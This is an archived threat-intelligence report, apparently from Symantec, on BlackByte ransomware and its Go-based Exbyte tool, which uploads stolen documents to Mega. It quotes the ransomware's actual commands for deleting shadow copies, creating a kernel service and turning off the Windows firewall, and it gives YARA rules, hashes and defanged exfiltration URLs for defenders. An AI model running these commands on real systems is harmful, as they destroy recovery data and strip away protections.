{ "id": "4be3c3bd-f12c-4e4c-9e35-18a58002b26d", "created_at": "2026-04-06T00:14:50.219771Z", "updated_at": "2026-04-10T03:32:24.841539Z", "deleted_at": null, "sha1_hash": "387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab", "title": "Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 71840, "plain_text": "Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool\r\nBy About the Author\r\nArchived: 2026-04-05 14:21:47 UTC\r\nSymantec’s Threat Hunter Team has discovered that at least one affiliate of the BlackByte ransomware (Ransom.Blackbyte)\r\noperation has begun using a custom data exfiltration tool during their attacks. The malware (Infostealer.Exbyte) is designed\r\nto expedite the theft of data from the victim’s network and upload it to an external server.\r\nBlackByte is a ransomware-as-a-service operation that is run by a cyber-crime group Symantec calls Hecamede. The group\r\nsprang to public attention in February 2022 when the U.S. Federal Bureau of Investigation (FBI) issued an alert stating that\r\nBlackByte had been used to attack multiple entities in the U.S., including organizations in at least three critical infrastructure\r\nsectors. In recent months, BlackByte has become one of the most frequently used payloads in ransomware attacks.\r\nInside Exbyte\r\nThe Exbyte exfiltration tool is written in Go and designed to upload stolen files to the Mega.co.nz cloud storage service.\r\nOn execution, Exbyte performs a series of checks for indicators that it may be running in a sandboxed environment. This is\r\nintended to make it more difficult for security researchers to analyze the malware. To do this, it calls the IsDebuggerPresent\r\nand CheckRemoteDebuggerPresent APIs. It then checks for the running processes from the following applications:\r\nMegaDumper 1.0 by CodeCracker / SnD\r\nImport reconstructor\r\nx64dbg\r\nx32dbg\r\nOLLYDBG\r\nWinDbg\r\nThe Interactive Disassembler\r\nImmunity Debugger - [CPU]\r\nIt then checks for the following anti-virus or sandbox-related files:\r\navghooka.dll\r\navghookx.dll\r\nsxin.dll\r\nsf2.dll\r\nsbiedll.dll\r\nsnxhk.dll\r\ncmdvrt32.dll\r\ncmdvrt64.dll\r\nwpespy.dll\r\nvmcheck.dll\r\npstorec.dll\r\ndir_watch.dll\r\napi_log.dll\r\ndbghelp.dll\r\nThis routine of checks is quite similar to the routine employed by the BlackByte payload itself, as documented recently by\r\nSophos.\r\nNext, Exbyte enumerates all document files on the infected computer, such as .txt, .doc, and .pdf files, and saves the full\r\npath and file name to %APPDATA%\\dummy. The files listed are then uploaded to a folder the malware creates on\r\nMega.co.nz. Credentials for the Mega account used are hardcoded into Exbyte.\r\nExbyte is not the first custom-developed data exfiltration tool to be linked to a ransomware operation. In November 2021,\r\nSymantec discovered Exmatter, an exfiltration tool that was used by the BlackMatter ransomware operation and has since\r\nbeen used in Noberus attacks. Other examples include the Ryuk Stealer tool and StealBit, which is linked to the LockBit\r\nransomware.\r\nBlackByte TTPs\r\nIn recent BlackByte attacks investigated by Symantec, the attackers exploited the ProxyShell (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) and ProxyLogon (CVE-2021-26855 and CVE-2021-27065) vulnerabilities in Microsoft\r\nExchange Servers to gain initial access.\r\nhttps://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\r\nPage 1 of 4\n\nSymantec has observed attackers using AdFind, AnyDesk, NetScan, and PowerView prior to deploying the ransomware\r\npayload.\r\nRecent attacks have used version 2.0 of the BlackByte payload. On execution, the ransomware payload itself appears to\r\ndownload and save debugging symbols from Microsoft. The command is executed directly from the ransomware:\r\npowershell -command \"(New-Object\r\nNet.WebClient).DownloadFile('http://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/11D60DB07BA7433B923F49867DF515721/ntkrnlmp.pdb',\r\n'CSIDL_SYSTEM_DRIVE\\systemdata\\ntkrnlmp.pdb')\"\r\nThe ransomware then checks the version information of ntoskrnl.exe and then creates a service with the following details:\r\nbinPath = C:\\systemdata\\generalate\r\ndisplayName = AAAAAAAAAAAAAA!!!!!!!!!!!!!!!\r\nBlackByte then proceeds with the removal of Kernel Notify Routines. The purpose of this is to attempt to bypass EDR\r\nproducts. This functionality in BlackByte has already been documented by Sophos and it closely resembles the techniques\r\nleveraged in the EDRSandblast tool.\r\nBlackByte uses VssAdmin to delete volume shadow copies and resize storage allocation:\r\ncmd.exe /c start vssadmin.exe Delete Shadows /All /Quiet\r\nvssadmin Resize ShadowStorage /For=K: /On=K: /MaxSize=401MB\r\nIt then makes the following service modifications:\r\nsc create ODosTEmONa binPath= CSIDL_SYSTEM_DRIVE\\systemdata\\generalate type= kernel\r\nsc.exe config RemoteRegistry start= auto\r\nsc.exe config Dnscache start= auto\r\nsc.exe config SSDPSRV start= auto\r\nsc.exe config fdPHost start= auto\r\nsc.exe config upnphost start= auto\r\nThe ransomware then modifies firewall settings to enable linked connections:\r\nnetsh advfirewall firewall set rule \"group=\\\"Network Discovery\\\" \" new enable=Yes\"\r\nnetsh advfirewall firewall set rule \"group=\\\"File and Printer Sharing\\\" \" new enable=Yes\"\r\ncmd.exe /c netsh advfirewall set allprofiles state off\r\nFinally, BlackByte injects itself into an instance of svchost.exe, conducts file encryption, and then deletes the ransomware\r\nbinary on disk:\r\ncmd.exe /c ping 1.1.1.1 -n 10 \u003e Nul \u0026 Del CSIDL_WINDOWS\\rdac.exe /F /Q\r\nCSIDL_SYSTEM\\svchost.exe -s 27262842\r\nEmerging Force\r\nFollowing the departure of a number of major ransomware operations such as Conti and Sodinokibi, BlackByte has emerged\r\nas one of the ransomware actors to profit from this gap in the market. The fact that actors are now creating custom tools for\r\nuse in BlackByte attacks suggests that it may be on the way to becoming one of the dominant ransomware threats.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nYara Rule\r\nrule blackbyte_exfil\r\n{\r\n     meta:\r\n      copyright = \"Symantec\"\r\nhttps://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\r\nPage 2 of 4\n\nfamily = \"Alias:ExfilTool\"\r\n      description = \"Detects exfil tool used by BlackByte ransomware\"\r\n     strings:\r\n      $data_str1 = {41 B9 04 00 00 00 66 66 0F 1F 84 00 00 00 00 00\r\n                    43 0F B6 84 02 A0 00 00 00 41 30 00 49 FF C0 49\r\n                    83 E9 01 75 EB 49 83 EB 01 75 D5 40 B7 09 48 8D}\r\n      $data_str2 = {32 10 05 AF 59 2E 0D 38 32 59 C0 99 E8 A5 87 CB}\r\n      $data_str3 = \"@BCEFHJLNPRTVY\" ascii\r\n     condition:\r\n       all of ($data_str*)\r\n        and filesize \u003e 2MB and filesize \u003c 3MB and\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\n}\r\nrule blackbyte_exfil_unpacked\r\n{\r\n     meta:\r\n      copyright = \"Symantec\"\r\n      family = \"Alias:ExfilTool\"\r\n      description = \"Detects unpacked exfil tool used by BlackByte ransomware\"\r\n     strings:\r\n      $str1 = \").Login\"\r\n      $str2 = \").NewUpload\"\r\n      $str3 = \").CreateDir\"\r\n      $str4 = \".PreloginMsg\"\r\n      $str5 = \".UploadCompleteMsg\"\r\n      $str6 = \").UploadFile\"\r\n                  $str7 = {FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A 08 02\r\n                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n                                                   07 75 6E 6B 6E 6F 77 6E 00 00 00 00 00 00 00 00}\r\n                  $c1 = {44 24 68 44 31 C2 88 50 10 0F B6 54 24 56 44 0F}\r\n                  $c2 = {FB 48 89 F7 4C 89 C6 E8 54 ED F6 FF 4C 8D 43 01}\r\n     condition:\r\n       all of ($str*) and ($c1 or $c2)\r\n        and filesize \u003e 8MB  and\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\n}\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256 file hashes:\r\nhttps://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\r\nPage 3 of 4\n\n3fb160e1770fafeedff2d77841bf02108c25cca4cb6d77e3fbf759077f356b70 - Infostealer.Exbyte\r\n0097b8722c8c0840e8c1a4dd579438344b3e6b4d630d17b0bbe9c55159f43142 - Infostealer.Exbyte\r\naeb1b789395357e8cc8dbd313b95f624fc03e037984040cd7c1704775bfb4bd2 - Infostealer.Exbyte\r\n477382529659c3452020170d8150820210ab8cbdc6417a0f0ac86a793cd0d9b4 - Ransom.Blackbyte\r\n1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad - Ransom.Blackbyte\r\n44a5e78fce5455579123af23665262b10165ac710a9f7538b764af76d7771550 - Ransom.Blackbyte\r\neb24370166021f9243fd98c0be7b22ab8cbc22147c15ecef8e75746eb484bb1a - Ransom.Blackbyte\r\nf361bafcc00b1423d24a7ea205264f5a0b96011e4928d9a91c2abc9911b433a1 - Ransom.Blackbyte\r\n20848d28414d4811b63b9645adb549eed0afbd6415d08b75b0a93fbf7cfbf21f - Ransom.Blackbyte\r\n754ac79aca0cc1bcf46000ef6c4cbe8bebeb50dae60823a1e844647ac16b6867 - Ransom.Blackbyte\r\nf157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e - AdFind\r\n794a5621fda2106fcb94cbd91b6ab9567fb8383caa7f62febafcf701175f2b91 - AdFind batch script\r\n572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b - NetScan\r\nefc2125e628b116eb0c097c699e473a47a280dfcd3e02cada41bdf6969600b41 - PowerView\r\n4877ff7c3c2abd349646db1163814811e69b36374e289f5808cc794113ef55ae - AnyDesk\r\nNetwork:\r\nhxxp://gfs270n392[.]userstorage.mega.co[.]nz/ul/PCfY6R3GKGjIEQK2tzWLODSlhG-h5NbxGHdNAToANCzjKK8Z6kdCiqshxM6ctHDKpLU09-YobgYybaQkCnpwnw/4718592\r\nhxxp://gfs262n303[.]userstorage.mega.co[.]nz/ul/f_re9dP6f9G8GAJhd3p43aJnvHnw7rCHLumJV-MXDlaL2RaSQQrPH1BYStJHWy4JkPgJ13KczuiJoOl0iwjxDA/15204352\r\nhxxp://gfs206n171[.]userstorage.mega.co[.]nz/ul/9Y39ts0Mp6xtige0-\r\nwHhmMG74YgASgG1UhZYfzl_fh8TN_TQo1gSa92TNe_HTBxvOTirA0yfouEE74-Y3Cy1Tw/81264640\r\nhxxp://gfs206n108[.]userstorage.mega.co[.]nz/ul/aX72PSSxERHKJwLdWCCOmsJQRioP7N6kcAltRRTbAgwGtNzcsdYa_7HTb4ToVV_HcVPORXotYA\r\nhxxp://gfs208n174.userstorage[.]mega.co.nz/ul/z6nR8uTohiga4QeILJsXcAWlt05Vhu2XiDlne_Qag-rgAmZkK2aZMvYrWC5FHRebBpMoxYZEEqSStHyvU6SnWQ/6815744\r\nhxxp://gfs214n129.userstorage[.]mega.co.nz/ul/wVJUlrn9bMLekALaMZx_o5FeK-U1oG9q4CWqHGNslUnVY2-\r\nBgJcEUxIJX9O4fXEWkt-x80LeAr7Jz9gXTCwzDA/2752512\r\nhxxp://gfs204n140.userstorage[.]mega.co.nz/ul/_Amu75VCTCu6BgIdFs8ZgHPyHqBFm5Cj8bV1xkM5QFt2T0x-9C_KlHQAQ3kX4bzj8jgmyK9-dlbmx9ef6Y9JDw/1966080\r\nSource: https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\r\nhttps://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware" ], "report_names": [ "blackbyte-exbyte-ransomware" ], "threat_actors": [ { "id": "4e453d66-9ecd-47d9-b63a-32fa5450f071", "created_at": "2024-06-19T02:03:08.077075Z", "updated_at": "2026-04-10T02:00:03.830523Z", "deleted_at": null, "main_name": "GOLD LOTUS", "aliases": [ "BlackByte", "Hecamede " ], "source_name": "Secureworks:GOLD LOTUS", "tools": [ "BlackByte", "Cobalt Strike", "ExByte", "Mega", "RDP", "SoftPerfect Network Scanner" ], "source_id": "Secureworks", "reports": null }, { "id": "4e7fd07d-fcc5-459b-b678-45a7d9cda751", "created_at": "2025-04-23T02:00:55.174827Z", "updated_at": "2026-04-10T02:00:05.353712Z", "deleted_at": null, "main_name": "BlackByte", "aliases": [ "BlackByte", "Hecamede" ], "source_name": "MITRE:BlackByte", "tools": [ "AdFind", "BlackByte Ransomware", "Exbyte", "Arp", "BlackByte 2.0 Ransomware", "PsExec", "Cobalt Strike", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434490, "ts_updated_at": 1775791944, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab.pdf", "text": "https://archive.orkl.eu/387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab.txt", "img": "https://archive.orkl.eu/387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab.jpg" } }